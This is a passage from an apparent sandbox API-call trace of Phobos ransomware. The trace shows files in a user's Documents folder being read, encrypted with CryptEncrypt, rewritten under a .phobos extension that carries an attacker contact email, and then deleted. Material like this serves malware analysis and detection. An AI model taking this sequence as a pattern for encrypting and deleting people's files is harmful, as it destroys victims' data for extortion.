"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\9p1v7bjt7t1re5.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.633] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.633] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\9p1v7bjt7T1RE5.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\9p1v7bjt7t1re5.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.634] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0196.634] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.634] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbbe8, lpOverlapped=0x0) returned 1 [0196.636] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbbf0, dwBufLen=0xbbf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbbf0) returned 1 [0196.636] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xbbf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xbbf0, lpOverlapped=0x0) returned 1 [0196.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0196.638] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.638] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0196.638] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.638] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0196.638] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.638] CloseHandle (hObject=0x154) returned 1 [0196.638] CloseHandle (hObject=0x15c) returned 1 [0196.638] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\9p1v7bjt7T1RE5.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\9p1v7bjt7t1re5.ods")) returned 1 [0196.639] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\MY1YRwHW.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\my1yrwhw.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.640] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=66853) returned 1 [0196.640] CloseHandle (hObject=0x15c) returned 1 [0196.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\MY1YRwHW.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\my1yrwhw.csv")) returned 0x20 [0196.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\MY1YRwHW.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\my1yrwhw.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\MY1YRwHW.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\my1yrwhw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.640] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.640] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\MY1YRwHW.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\my1yrwhw.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.641] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0196.641] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.641] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10525, lpOverlapped=0x0) returned 1 [0196.643] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10530, dwBufLen=0x10530 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10530) returned 1 [0196.643] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10530, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10530, lpOverlapped=0x0) returned 1 [0196.645] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0196.645] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.645] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.645] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.645] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.645] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.645] CloseHandle (hObject=0x15c) returned 1 [0196.645] CloseHandle (hObject=0x154) returned 1 [0196.645] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\MY1YRwHW.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\my1yrwhw.csv")) returned 1 [0196.650] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\t3r_xU_HAYRzhZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\t3r_xu_hayrzhz.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.650] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67961) returned 1 [0196.650] CloseHandle (hObject=0x154) returned 1 [0196.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\t3r_xU_HAYRzhZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\t3r_xu_hayrzhz.docx")) returned 0x20 [0196.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\t3r_xU_HAYRzhZ.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\t3r_xu_hayrzhz.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\t3r_xU_HAYRzhZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\t3r_xu_hayrzhz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.651] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.651] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\t3r_xU_HAYRzhZ.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\t3r_xu_hayrzhz.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.651] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0196.651] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.651] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10979, lpOverlapped=0x0) returned 1 [0196.800] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10980, dwBufLen=0x10980 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10980) returned 1 [0196.800] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10980, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10980, lpOverlapped=0x0) returned 1 [0196.802] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0196.802] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.802] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0196.802] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.802] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0196.802] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.802] CloseHandle (hObject=0x154) returned 1 [0196.802] CloseHandle (hObject=0x15c) returned 1 [0196.802] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\t3r_xU_HAYRzhZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\t3r_xu_hayrzhz.docx")) returned 1 [0196.804] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.805] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=402) returned 1 [0196.805] CloseHandle (hObject=0x15c) returned 1 [0196.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini")) returned 0x26 [0196.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.805] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.805] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.029] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.029] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x192, lpOverlapped=0x0) returned 1 [0197.029] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0) returned 1 [0197.029] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a0, lpOverlapped=0x0) returned 1 [0197.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0197.030] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.030] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.030] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.030] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.031] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.031] CloseHandle (hObject=0x15c) returned 1 [0197.031] CloseHandle (hObject=0xac) returned 1 [0197.031] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini")) returned 1 [0197.031] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkPk.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jkpk.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.032] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=88585) returned 1 [0197.032] CloseHandle (hObject=0xac) returned 1 [0197.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkPk.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jkpk.pptx")) returned 0x20 [0197.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkPk.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jkpk.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkPk.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jkpk.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.033] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.033] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkPk.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jkpk.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.033] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.033] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x15a09, lpOverlapped=0x0) returned 1 [0197.035] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15a10, dwBufLen=0x15a10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15a10) returned 1 [0197.035] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x15a10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x15a10, lpOverlapped=0x0) returned 1 [0197.037] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0197.037] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.037] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.037] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.038] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.038] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.038] CloseHandle (hObject=0xac) returned 1 [0197.038] CloseHandle (hObject=0x15c) returned 1 [0197.038] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jkPk.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jkpk.pptx")) returned 1 [0197.039] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\1X6Tb_ump.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\1x6tb_ump.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.040] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=37339) returned 1 [0197.040] CloseHandle (hObject=0x15c) returned 1 [0197.040] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\1X6Tb_ump.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\1x6tb_ump.xlsx")) returned 0x20 [0197.040] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\1X6Tb_ump.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\1x6tb_ump.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\1X6Tb_ump.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\1x6tb_ump.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.040] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 